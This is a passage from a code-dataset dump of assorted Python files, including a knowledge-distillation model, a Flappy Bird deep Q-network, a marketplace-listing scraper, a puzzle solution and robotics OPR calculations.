cmap=plt.cm.spectral)\n\n\t# Plot the edges\n\tstart_idx, end_idx = np.where(non_zero)\n\t#a sequence of (*line0*, *line1*, *line2*), where::\n\t# linen = (x0, y0), (x1, y1), ... (xm, ym)\n\tsegments = [[embedding[:, start], embedding[:, stop]]\n\t for start, stop in zip(start_idx, end_idx)]\n\tvalues = np.abs(partial_correlations[non_zero])\n\tlc = LineCollection(segments,\n\t zorder=0, cmap=plt.cm.hot_r,\n\t norm=plt.Normalize(0, .7 * values.max()))\n\tlc.set_array(values)\n\tlc.set_linewidths(15 * values)\n\tax.add_collection(lc)\n\n\t# Add a label to each node. The challenge here is that we want to\n\t# position the labels to avoid overlap with other labels\n\tfor index, (name, label, (x, y)) in enumerate(\n\t zip(names, labels, embedding.T)):\n\n\t dx = x - embedding[0]\n\t dx[index] = 1\n\t dy = y - embedding[1]\n\t dy[index] = 1\n\t this_dx = dx[np.argmin(np.abs(dy))]\n\t this_dy = dy[np.argmin(np.abs(dx))]\n\t if this_dx > 0:\n\t horizontalalignment = 'left'\n\t x = x + .002\n\t else:\n\t horizontalalignment = 'right'\n\t x = x - .002\n\t if this_dy > 0:\n\t verticalalignment = 'bottom'\n\t y = y + .002\n\t else:\n\t verticalalignment = 'top'\n\t y = y - .002\n\t plt.text(x, y, name, size=10,\n\t horizontalalignment=horizontalalignment,\n\t verticalalignment=verticalalignment,\n\t bbox=dict(facecolor='w',\n\t edgecolor=plt.cm.spectral(label / float(n_labels)),\n\t alpha=.6))\n\n\tplt.xlim(embedding[0].min() - .15 * embedding[0].ptp(),\n\t embedding[0].max() + .10 * embedding[0].ptp(),)\n\tplt.ylim(embedding[1].min() - .03 * embedding[1].ptp(),\n\t embedding[1].max() + .03 * embedding[1].ptp())\n\n\tplt.show()\n\nmain()\n\n\n","sub_path":"symbolmap.py","file_name":"symbolmap.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357417113","text":"from random import randint\nv = 0\nwhile True:\n player = int(input(\"Vamos brincar de par ou ímpar? Escolha um número! -> \"))\n pc = randint(0, 10)\n total = player + pc\n tipo = ' '\n while tipo not in \"PI\":\n tipo = str(input('Você quer par ou ímpar? [P/I] ')).strip().upper()[0]\n print(f'Você jogou {player} e o computador {pc}. A soma dá {total}! ', end='')\n if tipo == 'P':\n if total % 2 == 0:\n print('Você venceu!')\n v += 1\n else:\n print('Você perdeu!')\n break\n elif tipo == 'I':\n if total % 2 == 1:\n print('Você venceu!')\n v += 1\n else:\n print('Você perdeu!')\n break\n print('Vamos de novo...?')\nprint(f'Game over! Você venceu {v} vezes.')","sub_path":"ex068a.py","file_name":"ex068a.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14803515","text":"def is_even(num):\n if num % 2 == 0:\n return True\n else:\n return False\n\n\nn, a, b = map(int, input().split())\ntables = [n] * 2\nif is_even(a) and is_even(b):\n print(abs(a - b) // 2)\nelif not is_even(a) and not is_even(b):\n print(abs(a - b) // 2)\nelse:\n print(min(abs(1 - a), abs(b - n)) + 1 + (b - a - 1) // 2)\n","sub_path":"python/AGC041/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"500545398","text":"\n\n#calss header\nclass _WET():\n\tdef __init__(self,): \n\t\tself.name = \"WET\"\n\t\tself.definitions = [u'to make something wet: ', u'to urinate in your clothes by accident', u'to urinate in your bed by accident: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_wet.py","file_name":"_wet.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427438985","text":"import os, glob\nimport torch\nimport numpy as np\nimport torch.nn.functional as F\nfrom .base_model import BaseModel\nfrom .teacher_networks import TeacherModel, TeacherModel_AVL\nfrom .networks.classifier import LSTMClassifier, FcClassifier, EF_model\nfrom .networks.tools import init_net\nfrom .networks.spectral_loss import SpectralLoss, OrthPenalty\nfrom .networks.soft_center_loss import SoftCenterLoss\n\nclass SpectralModel(BaseModel):\n @staticmethod\n def modify_commandline_options(parser, is_train=True):\n # parser.set_defaults(no_dropout=True)\n parser.add_argument('--mid_layers', type=str, default='256,128', help='256,128 for 2 layers with 256, 128 nodes respectively')\n parser.add_argument('--input_dim_a', type=int, default=1582, help='input dim for acoustic domain')\n parser.add_argument('--input_dim_l', type=int, default=1024, help='input dim for lexical domain')\n parser.add_argument('--hidden_size', type=int, default=512, help='hidden size for lstm')\n parser.add_argument('--lstm_fc1_size', type=int, default=256, help='fc size for lstm_classifier')\n parser.add_argument('--fusion_size', type=int, default=128, help='fusion latent vector size in fusion model')\n parser.add_argument('--output_dim', type=int, default=4, help='output dim')\n parser.add_argument('--dropout_rate', type=float, default=0.2, help='rate of dropout')\n parser.add_argument('--teacher_path', type=str, default='/data2/ljj/SSER_model/setup_ss_batchsize_128_lr_0.001_tgt_discrete_mark_IS10+bert+decoder+mmd+0.3+negative+valid_ami/')\n # parser.add_argument('--kd_weight', type=float, default=1.0, help='weight of kd loss')\n parser.add_argument('--pretrained_dir', type=str, default='checkpoints/spec_pretrained_dir')\n parser.add_argument('--kd_temp', type=float, default=3.0, help='knowledge distilling temperature')\n parser.add_argument('--kd_start_epoch', type=int, default=10, help='knowledge distilling start epoch')\n parser.add_argument('--cvNo', type=int, help='which cross validation set')\n parser.add_argument('--modality', type=str, help='which modality to use for student model')\n parser.add_argument('--adjacent_path', type=str, help='path to adjacent matrix file')\n parser.add_argument('--orth_weight', type=float, help='weight of orthogonal penalty')\n parser.add_argument('--spec_weight', type=float, help='weight of spectral loss')\n parser.add_argument('--center_weight', type=float, default=0.0, help='weight of soft center weight')\n return parser\n\n def __init__(self, opt):\n \"\"\"Initialize the LSTM autoencoder class\n\n Parameters:\n opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions\n \"\"\"\n super().__init__(opt)\n self.teacher_path = os.path.join(opt.teacher_path, f'cvNo{opt.cvNo}')\n self.teacher_model = TeacherModel_AVL(self.teacher_path, fusion_dim=384).cuda()\n self.loss_names = ['KD', 'spec', 'orth', 'center']\n self.modality = opt.modality\n # acoustic student model\n if self.modality == 'acoustic':\n self.model_names = ['A'] \n layers = list(map(lambda x: int(x), opt.mid_layers.split(',')))\n self.netA = init_net(FcClassifier(opt.input_dim_a, layers, opt.output_dim), \n opt.init_type, opt.init_gain, gpu_ids=opt.gpu_ids)\n\n # visual student model\n elif self.modality == 'lexical':\n self.model_names = ['L']\n self.netL = init_net(LSTMClassifier(opt.input_dim_v, opt.hidden_size, \n opt.lstm_fc1_size, opt.output_dim, opt.dropout_rate),\n opt.init_type, opt.init_gain, gpu_ids=opt.gpu_ids)\n # input_size, hidden_size, fc1_size, output_size, dropout_rate\n \n elif self.modality == 'A+L':\n self.model_names = ['A_L']\n layers = list(map(lambda x: int(x), opt.mid_layers.split(',')))\n fc_classifier = FcClassifier(opt.input_dim_a, layers, opt.output_dim) \n lstm_classifier = LSTMClassifier(opt.input_dim_l, opt.hidden_size, \n opt.lstm_fc1_size, opt.output_dim, opt.dropout_rate)\n \n self.netA_L = init_net(EF_model(fc_classifier, lstm_classifier, layers[-1], opt.lstm_fc1_size, \n opt.fusion_size, opt.output_dim, opt.dropout_rate),\n opt.init_type, opt.init_gain, gpu_ids=opt.gpu_ids)\n # fc_classifier, lstm_classifier, out_dim_a, out_dim_v, fusion_size, num_class\n if self.isTrain:\n self.adjacent = np.load(opt.adjacent_path)\n self.criterion_kd = torch.nn.BCELoss()\n self.criterion_spec = SpectralLoss(self.adjacent)\n self.criterion_orth = OrthPenalty()\n self.criterion_center = SoftCenterLoss(4, layers[-1] if self.modality=='acoustic' \n else opt.fusion_size)\n # initialize optimizers; schedulers will be automatically created by function .\n self.optimizer = torch.optim.Adam(\n getattr(self, 'net'+self.model_names[0]).parameters(), \n lr=opt.lr, betas=(opt.beta1, 0.999))\n # self.optimizer_clf = torch.optim.Adam(self.netA.module.fc_out.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n # print(self.netA.module.[-1])\n # input()\n self.optimizers.append(self.optimizer)\n self.temp = opt.kd_temp\n self.spec_weight = opt.spec_weight\n self.orth_weight = opt.orth_weight\n self.kd_start_epoch = opt.kd_start_epoch\n self.center_weight = opt.center_weight\n \n # init parameter from pretrained model\n if self.isTrain and opt.pretrained_dir != \"None\":\n print(os.path.join(opt.pretrained_dir, str(opt.cvNo), '*_net_{}'.format(self.model_names[0])))\n model_path = glob.glob(\n os.path.join(opt.pretrained_dir, str(opt.cvNo), '*_net_{}.pth'.format(self.model_names[0])))[0]\n getattr(self, 'net'+self.model_names[0]).module.load_state_dict(torch.load(model_path))\n print(\"Model init from {}\".format(model_path))\n\n # modify save_dir\n self.save_dir = os.path.join(self.save_dir, str(opt.cvNo))\n if not os.path.exists(self.save_dir):\n os.mkdir(self.save_dir)\n \n def set_input(self, input):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n Parameters:\n input (dict): include the data itself and its metadata information.\n\n \"\"\"\n self.acoustic = input['acoustic'].float().cuda()\n self.lexical = input['lexical'].float().cuda()\n self.visual = input['visual'].float().cuda()\n self.label = input['label'].cuda()\n self.index = input['index'].cuda()\n # self.label = self.label.argmax(dim=1)\n\n def forward(self):\n \"\"\"Run forward pass; called by both functions and .\"\"\"\n if self.isTrain:\n with torch.no_grad():\n self.teacher_logits = self.teacher_model(self.acoustic, self.lexical, self.visual)\n self.teacher_pred = F.softmax(self.teacher_logits / self.temp, dim=-1)\n # for acoustic modality\n if self.modality == 'acoustic':\n self.student_logits, self.student_feat = self.netA(self.acoustic)\n # for lexical modality\n elif self.modality == 'lexical':\n self.student_logits, self.student_feat = self.netL(self.lexical)\n elif self.modality == 'A+L':\n self.student_logits, self.student_feat = self.netA_L(self.acoustic, self.lexical)\n \n\n self.student_pred = F.softmax(self.student_logits / self.temp, dim=1)\n\n def backward(self, kd_start):\n \"\"\"Calculate the loss \"\"\"\n if kd_start:\n self.loss_KD = self.criterion_kd(self.student_pred, self.teacher_pred)\n else:\n self.loss_KD = torch.tensor(0).cuda()\n\n self.loss_spec = self.spec_weight * self.criterion_spec(self.student_feat, self.index)\n self.loss_orth = self.orth_weight * self.criterion_orth(self.student_feat)\n self.loss_center = self.center_weight * self.criterion_center(self.student_feat, self.teacher_pred)\n loss = self.loss_KD + self.loss_spec + self.loss_orth + self.loss_center\n loss.backward()\n torch.nn.utils.clip_grad_norm_(getattr(self, 'net'+self.model_names[0]).parameters(), 0.1)\n\n def backward_spec(self):\n \"\"\"Calculate the loss for reconstruct feature\"\"\"\n # if kd_start:\n # self.loss_KD = self.criterion_kd(self.student_pred, self.teacher_pred)\n # else:\n # self.loss_KD = torch.tensor(0).cuda()\n \n self.loss_spec = self.spec_weight * self.criterion_spec(self.student_feat, self.index)\n self.loss_orth = self.orth_weight * self.criterion_orth(self.student_feat)\n self.loss_KD = torch.tensor(0).cuda() \n # loss = self.loss_KD + self.loss_spec # + self.loss_orth\n loss = self.loss_spec + self.loss_orth\n loss.backward(retain_graph=True)\n torch.nn.utils.clip_grad_norm_(getattr(self, 'net'+self.model_names[0]).parameters(), 0.1)\n \n def backward_clf(self):\n \"\"\"Calculate the loss for reconstruct feature\"\"\"\n self.loss_KD = self.criterion_kd(self.student_pred, self.teacher_pred)\n self.loss_KD.backward()\n torch.nn.utils.clip_grad_norm(self.netA.parameters(), 1)\n self.loss_spec = torch.tensor(0).cuda() \n self.loss_orth = torch.tensor(0).cuda() \n\n def optimize_parameters(self, epoch):\n \"\"\"Calculate losses, gradients, and update network weights; called in every training iteration\"\"\"\n # forward\n self.forward() \n # backward\n self.optimizer.zero_grad() \n self.backward(epoch>=self.kd_start_epoch)\n self.optimizer.step()\n # # backward\n # if epoch <= self.kd_start_epoch:\n # self.optimizer.zero_grad() \n # self.backward_spec()\n # self.optimizer.step()\n # else:\n # # backward clf\n # self.optimizer_clf.zero_grad()\n # self.backward_clf() \n # self.optimizer_clf.step()","sub_path":"models/spectral_model.py","file_name":"spectral_model.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"104397673","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport cv2\nimport sys\nsys.path.append(\"game/\")\nimport wrapped_flappy_bird as game\nimport random\nimport numpy as np\nfrom collections import deque\n\nGAME = 'bird' # the name of the game being played for log files\nACTIONS = 2 # number of valid actions\nGAMMA = 0.99 # decay rate of past observations\nOBSERVE = 100000. # timesteps to observe before training\nEXPLORE = 2000000. # frames over which to anneal epsilon\nFINAL_EPSILON = 0.0001 # final value of epsilon\nINITIAL_EPSILON = 0.0001 # starting value of epsilon\nREPLAY_MEMORY = 50000 # number of previous transitions to remember\nBATCH = 32 # size of minibatch\nFRAME_PER_ACTION = 1\n\ndef show_img(img,window_name='img'):\n cv2.imshow(window_name,img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\ndef preprocess_img(img):\n # 压缩图像至80*80\n img=cv2.resize(img, (80, 80))\n # 转换为灰阶图像\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # 二值化图像\n _, img = cv2.threshold(img,1,255,cv2.THRESH_BINARY)\n return img\n\ndef create_network():\n # 输入层 80(高)*80(宽)*4(连续4幅图像的在该位置像素值)\n input_layer = tf.placeholder(\"float\", [None, 80, 80, 4])\n\n # 根据shape生成truncated normal分布的权重张量\n def weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev = 0.01)\n return tf.Variable(initial)\n \n # 根据shape生成truncated normal分布的偏差张量\n def bias_variable(shape):\n initial = tf.constant(0.01, shape = shape)\n return tf.Variable(initial)\n\n # 2d图像卷积\n def conv2d(x, W, stride):\n return tf.nn.conv2d(x, W, strides = [1, stride, stride, 1], padding = \"SAME\")\n\n # 隐藏层\n # 卷积池化层1\n W_conv1 = weight_variable([8, 8, 4, 32]) \n b_conv1 = bias_variable([32]) \n h_conv1 = tf.nn.relu(conv2d(input_layer, W_conv1, 4) + b_conv1)\n def max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = \"SAME\")\n h_pool1 = max_pool_2x2(h_conv1)\n\n # 卷积层2\n W_conv2 = weight_variable([4, 4, 32, 64])\n b_conv2 = bias_variable([64])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2, 2) + b_conv2)\n\n # 卷积层3\n W_conv3 = weight_variable([3, 3, 64, 64])\n b_conv3 = bias_variable([64])\n h_conv3 = tf.nn.relu(conv2d(h_conv2, W_conv3, 1) + b_conv3)\n h_conv3_flat = tf.reshape(h_conv3, [-1, 1600])\n \n # 全连接层\n W_fc1 = weight_variable([1600, 512])\n b_fc1 = bias_variable([512])\n h_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, W_fc1) + b_fc1)\n\n # 输出层\n W_fc2 = weight_variable([512, ACTIONS])\n b_fc2 = bias_variable([ACTIONS])\n readout = tf.matmul(h_fc1, W_fc2) + b_fc2\n\n return input_layer, readout, h_fc1\n\ndef train_network(s, readout, h_fc1, sess):\n # 定义误差函数\n a = tf.placeholder(\"float\", [None, ACTIONS])\n y = tf.placeholder(\"float\", [None])\n readout_action = tf.reduce_sum(tf.multiply(readout, a), reduction_indices=1)\n cost = tf.reduce_mean(tf.square(y - readout_action))\n \n # 训练目标\n train_step = tf.train.AdamOptimizer(1e-6).minimize(cost)\n\n # open up a game state to communicate with emulator\n game_state = game.GameState()\n\n # 经验内存\n mem = deque()\n\n # printing\n a_file = open(\"logs_\" + GAME + \"/readout.txt\", 'w')\n h_file = open(\"logs_\" + GAME + \"/hidden.txt\", 'w')\n\n \n do_nothing = np.zeros(ACTIONS)\n do_nothing[0] = 1\n \n # 得到初始状态,预处理图像压缩至80*80灰阶\n img, _, _ = game_state.frame_step(do_nothing)\n img=preprocess_img(img)\n state = np.stack((img, img, img, img), axis=2)\n\n # 保存、加载网络\n saver = tf.train.Saver()\n sess.run(tf.initialize_all_variables())\n checkpoint = tf.train.get_checkpoint_state(\"saved_networks\")\n if checkpoint and checkpoint.model_checkpoint_path:\n saver.restore(sess, checkpoint.model_checkpoint_path)\n print(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\n else:\n print(\"Could not find old network weights\")\n\n # 开始训练\n epsilon = INITIAL_EPSILON\n t = 0\n while True:\n # choose an action epsilon-greedily\n readout_t = readout.eval(feed_dict={s : [state]})[0]\n a_t = np.zeros([ACTIONS])\n action_index = 0\n if t % FRAME_PER_ACTION == 0:\n if random.random() <= epsilon:\n print(\"----------Random Action----------\")\n action_index = random.randrange(ACTIONS)\n a_t[random.randrange(ACTIONS)] = 1\n else:\n action_index = np.argmax(readout_t)\n a_t[action_index] = 1\n else:\n a_t[0] = 1 # do nothing\n\n # 随着游戏训练进行逐渐降低epsilon\n if epsilon > FINAL_EPSILON and t > OBSERVE:\n epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE\n\n # 输入所选动作并观察下一时刻状态及收益\n img, reward, terminal = game_state.frame_step(a_t)\n img=preprocess_img(img)\n img = np.reshape(img, (80, 80, 1))\n state_ = np.append(img, state[:, :, :3], axis=2)\n\n # 存储状态至经验内存\n mem.append((state, a_t, reward, state_, terminal))\n \n if len(mem) > REPLAY_MEMORY:\n mem.popleft()\n\n # only train if done observing\n if t > OBSERVE:\n # 从经验内存中抽样作为训练样本\n minibatch = random.sample(mem, BATCH)\n\n # 批处理变量\n S = [d[0] for d in minibatch]\n A = [d[1] for d in minibatch]\n R = [d[2] for d in minibatch]\n S_ = [d[3] for d in minibatch]\n\n Y = []\n S_readout = readout.eval(feed_dict = {s : S_})\n for i in range(0, len(minibatch)):\n terminal = minibatch[i][4]\n # if terminal, only equals reward\n if terminal:\n Y.append(R[i])\n else:\n Y.append(R[i] + GAMMA * np.max(S_readout[i]))\n\n # 使用梯度下降算法调整网络权重\n train_step.run(feed_dict = {\n y : Y,\n a : A,\n s : S}\n )\n\n # 更新状态\n state=state_\n t += 1\n\n # save progress every 10000 iterations\n if t % 10000 == 0:\n saver.save(sess, 'saved_networks/' + GAME + '-dqn', global_step = t)\n\n # print info\n phase = \"\"\n if t <= OBSERVE:\n phase = \"observe\"\n elif t > OBSERVE and t <= OBSERVE + EXPLORE:\n phase = \"explore\"\n else:\n phase = \"train\"\n\n print(\"timestep\", t,\n \" phase\", phase,\n \" epsilon\", epsilon,\n \" action\", action_index,\n \" reward\", reward,\n \" q_max %e\" % np.max(readout_t))\n \n ### write info to files\n # if t % 10000 <= 100:\n # a_file.write(\",\".join([str(x) for x in readout_t]) + '\\n')\n # h_file.write(\",\".join([str(x) for x in h_fc1.eval(feed_dict={s:[s_t]})[0]]) + '\\n')\n # cv2.imwrite(\"logs_tetris/frame\" + str(t) + \".png\", x_t1)\n\nif __name__ == \"__main__\":\n sess = tf.InteractiveSession()\n s, readout, h_fc1 = create_network()\n train_network(s, readout, h_fc1, sess)\n","sub_path":"deep_q_network.py","file_name":"deep_q_network.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606926380","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nimport requests\nimport re\nfrom time import sleep\nimport sys\n\nclass LetgoSpider(scrapy.Spider):\n name = 'letgo'\n allowed_domains = ['letgo.com/en', 'search-products-pwa.letgo.com']\n start_urls = ['https://search-products-pwa.letgo.com/api/products?country_code=US&offset=0&quadkey=0320030123201&num_results=50&distance_radius=50&distance_type=mi']\n offset = 0\n \n def parse(self, response):\n data = json.loads(response.text)\n if len(data) == 0:\n sys.exit()\n else:\n for used_item in data:\n try:\n if used_item['name'] == None:\n title = used_item['image_information']\n else:\n title = used_item['name']\n id_number = used_item['id']\n price = used_item['price']\n description = used_item['description']\n date = used_item['updated_at']\n images = [img['url'] for img in used_item['images']]\n latitude = used_item['geo']['lat']\n longitude = used_item['geo']['lng']\n link = 'https://us.letgo.com/en/i/' + re.sub(r'\\W+', '-', title) + '_' + id_number\n location = used_item['geo']['city']\n except:\n pass\n\n yield {'Title': title,\n 'Url': link,\n 'Price': price,\n 'Description': description,\n 'Date': date,\n 'Images': images,\n 'Latitude': latitude,\n 'Longitude': longitude,\n 'Location': location,\n } \n \n self.offset += 50\n new_request = 'https://search-products-pwa.letgo.com/api/products?country_code=US&offset=' + str(self.offset) + \\\n '&quadkey=0320030123201&num_results=50&distance_radius=50&distance_type=mi'\n print('new request is: ' + new_request)\n sleep(1)\n yield scrapy.Request(new_request, callback=self.parse)\n \n \n","sub_path":"final_project/build/lib/final_project/spiders/letgo.py","file_name":"letgo.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"485235348","text":"# -*- coding: utf-8 -*-\nfrom Arya.backends.base_module import BaseSaltMoude\nimport os\nfrom Arya.backends import tasks\n\nclass State(BaseSaltMoude):\n\n def apply(self):\n \"\"\"\n 解析任务\n 执行任务\n 放到任务队列\n 返回任务队列id\n :return:\n \"\"\"\n if '-f' in self.sys_args:\n # yam 配置文件\n yaml_file_index = self.sys_args.index('-f') + 1\n\n try:\n # 保存配置文件\n yaml_file_name = self.sys_args[yaml_file_index]\n state_data = self.load_state_files(yaml_file_name)\n\n # 按照不同的操作系统生成不同的配置文件\n for os_type, os_type_data in self.config_data_dic.items():\n\n for section_name, section_data in state_data.items():\n # print(section_name)\n for mod_name, mod_data in section_data.items():\n # print(' ', mod_name) # user.present\n\n # 根据配置文件的名字,在plugins中判断是否存在此模块\n base_mode_name = mod_name.split('.')[0] # user\n\n module_obj = self.get_module_instance(base_mode_name=base_mode_name, os_type=os_type)\n moudle_parse_result = module_obj.syntax_parser(section_name, mod_name, mod_data, os_type)\n self.config_data_dic[os_type].append(moudle_parse_result)\n\n print('config_data_dic'.center(60, '*'))\n print(self.config_data_dic)\n\n # 生成任务mq消息\n new_task_obj = tasks.TaskHandle(self.db_models,self.config_data_dic,self.settings,self)\n new_task_obj.dispatch_task() # 分发任务\n\n except IndexError as e:\n exit('state file must -f after')\n\n else:\n exit('state file must -f after')\n\n","sub_path":"stack/Arya/plugins/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"146810183","text":"# Christopher Chay\n# 2016.3.31\n# Assignment 8: Error Handling\n# Grade: ---\n\ndef createSuper( x, y, z, a ):\n x, y, z, a = x, y, z, a\n return 'Superhero: ' + str(x) + '\\n' + \\\n 'Secret Identity: ' + str(y) + '\\n' + \\\n 'Age: ' + str(z) + '\\n' + \\\n 'Powers: ' + int(a)\n \n\ntry:\n super1 = createSuper( 'Spider Man', 'Peter Parker', 20, 'Wall crawling, super strength, agility, web' )\n super2 = createSuper( 'Captain America', 'Steve Rogers', 18, 'Super strength, Super-high Endurance, Super-speed' )\n super3 = createSuper( 'Super Man', 'Clark Kent', 32, 'Super strength, Flight, Laser-vision, Heat-Vision, Icy-Breath' )\n\nexcept ValueError as e:\n print( '\\nError Message:', e, '\\n' )\nexcept TypeError as e:\n print( '\\nError Message:', e, '\\n' )\nexcept AttributeError as e:\n print( '\\nError Message:', e, '\\n' )\nexcept NameError as e:\n print( '\\nError Message:', e, '\\n' )\nelse:\n print( str(super1) + '\\n\\n' + str(super2) + '\\n\\n' + str(super3) ) \n \n\n \n","sub_path":"c2/python/prog.100/assignments/assignment8_ErrorHandling.py","file_name":"assignment8_ErrorHandling.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"40388038","text":"import collections\n\nfile = open(\"input/day24\",\"r\")\ninput = file.read().strip().splitlines()\n\ndef build(input):\n dic = collections.defaultdict(set)\n lis = [x.split('/') for x in input]\n lis = [(int(a),int(b)) for a,b in lis]\n for x,y in lis:\n dic[x].add(y)\n dic[y].add(x)\n return dic\n\n\ndef generator(base,comps):\n brid = base[-1][1]\n for el in comps[brid]:\n if not ((brid, el) in base or (el, brid) in base):\n bridge = base+[(brid, el)]\n yield bridge\n yield from generator(bridge,comps)\n\n\ndef task1():\n elements = build(input)\n max = 0\n basic = [(0,0)]\n for bridge in generator(basic,elements):\n a = sum(a+b for a, b in bridge)\n if a > max:\n max = a\n print(max)\n\ndef task2():\n elements = build(input)\n maxbridge = collections.defaultdict(set)\n basic = [(0,0)]\n for bridge in generator(basic,elements):\n dif = sum(a+b for a, b in bridge)\n maxbridge[len(bridge)].add(dif)\n \n print(max(maxbridge[max(maxbridge, key=int)]))\n\n\ntask1()\ntask2()","sub_path":"2017/day24.py","file_name":"day24.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"181335537","text":"\n\nimport cPickle as cP\nimport numpy as np\nfrom universal import *\n#import pylab as plt\n\nevol, AgeMatch, RangeMass = cP.load(open(picklePath+'marigoETAL2008.pickle','rb'))\n\ndef checkMassRange(mass):\n RangeDict = {}\n for YY in evol.keys():\n if (mass > RangeMass[YY][0]) and (mass < RangeMass[YY][1]):\n RangeDict[YY] = True\n else:\n RangeDict[YY] = True\n \n return RangeDict\n \ndef CheckInRange(RangeDict):\n \n InRange = False\n YYOut = None\n #print AgeMatch\n for YY in AgeMatch:\n InRange = RangeDict[YY]\n if InRange:\n YYOut = YY\n break\n \n return InRange, YYOut\n\ndef getPar(mass,parname):\n\n RangeDict = checkMassRange(mass)\n InRange, YY = CheckInRange(RangeDict)\n ParVal = None\n \n mass = float(mass)\n mass_arr = np.array(evol[YY]['mass'])\n parr_arr = np.array(evol[YY][parname])\n \n if InRange:\n ParVal = np.interp(mass,mass_arr,parr_arr)\n else:\n raise NameError('mass not in range')\n \n return ParVal\n\ndef getAllPars(mass):\n \n RangeDict = checkMassRange(mass)\n InRange, YY = CheckInRange(RangeDict)\n OutDict = {}\n \n for par in evol[YY].keys():\n ParVal = getPar(mass,par)\n #if par == 'teff':\n #print mass, InRange, YY, ParVal\n #print par, ParVal\n OutDict[par] = ParVal\n\n return OutDict\n","sub_path":"evol.py","file_name":"evol.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"64936734","text":"from typing import List, Dict, Union\n\nimport numpy as np\n\nfrom core.models import Match, Team, Event, ScoreField\n\n\ndef to_number(num: str) -> Union[int, float]:\n try:\n return int(num)\n except ValueError:\n return float(num)\n\n\ndef calculate_oprs(matches: List[Match]) -> Dict[int, float]:\n \"\"\"Calculates the offensive potential ratings (OPRs) of each team that played in the given set of matches.\n\n Args:\n matches: A set of matches played.\n\n Returns:\n A dictionary where k is a team id and v is their OPR. Will return an empty dictionary if the match data\n matrix is singular and thus the OPR matrix cannot be solved for.\n \"\"\"\n teams = Team.objects.filter(played__in=matches).distinct()\n max_id = teams.count()\n\n d = {t.id: c for c, t in enumerate(teams)}\n b = np.zeros(max_id)\n a = np.matrix([[0 for _ in range(max_id)] for _ in range(max_id)])\n\n for match in matches:\n for blue1, red1 in zip(match.blue_played.all(), match.red_played.all()):\n for blue2, red2 in zip(match.blue_played.all(), match.red_played.all()):\n a[(d[blue1.id], d[blue2.id])] += 1\n a[(d[red1.id], d[red2.id])] += 1\n\n b[d[blue1.id]] += match.blue_score\n b[d[red1.id]] += match.red_score\n\n try:\n oprs = np.linalg.solve(a, b)\n except np.linalg.LinAlgError as e:\n print(f'Unable to solve for OPRs -- singular matrix')\n return {}\n\n return {t: oprs[i] for t, i in d.items()}\n\n\ndef jackknife_oprs(matches: List[Match]):\n matches = list(matches) # double check to convert from a QuerySet object\n oprs = []\n for m in matches:\n print(m.key)\n match_copy = matches.copy()\n match_copy.remove(m)\n oprs.append(calculate_oprs(match_copy))\n\n div = len(oprs)\n sampled_oprs = {}\n for opr in oprs:\n for team, opr_val in opr.items():\n if team not in sampled_oprs:\n sampled_oprs[team] = 0\n sampled_oprs[team] += opr_val\n\n for team, val in sampled_oprs.items():\n sampled_oprs[team] /= div\n\n return sampled_oprs\n\n\n__component_oprs_per_year = {\n 2017: {'autoFuelPoints', 'autoPoints', 'teleopFuelPoints', 'teleopRotorPoints',\n 'autoRotorPoints', 'teleopTakeoffPoints', 'totalPoints'}\n}\n\n\ndef component_oprs_at_event(event: Event) -> Dict[int, Dict[str, float]]:\n teams = event.teams.all()\n max_id = teams.count()\n coprs = {}\n\n for component in ScoreField.objects.values_list('name', flat=True).distinct():\n if component not in __component_oprs_per_year[event.year]:\n continue\n\n d = {t.id: c for c, t in enumerate(teams)}\n b = np.zeros(max_id)\n a = np.matrix([[0 for _ in range(max_id)] for _ in range(max_id)])\n\n for match in event.match_set.all():\n for blue1, red1 in zip(match.blue_played.all(), match.red_played.all()):\n for blue2, red2 in zip(match.blue_played.all(), match.red_played.all()):\n a[(d[blue1.id], d[blue2.id])] += 1\n a[(d[red1.id], d[red2.id])] += 1\n\n b[d[blue1.id]] += to_number(match.scorefield_set.get(name=component, color='blue').value)\n 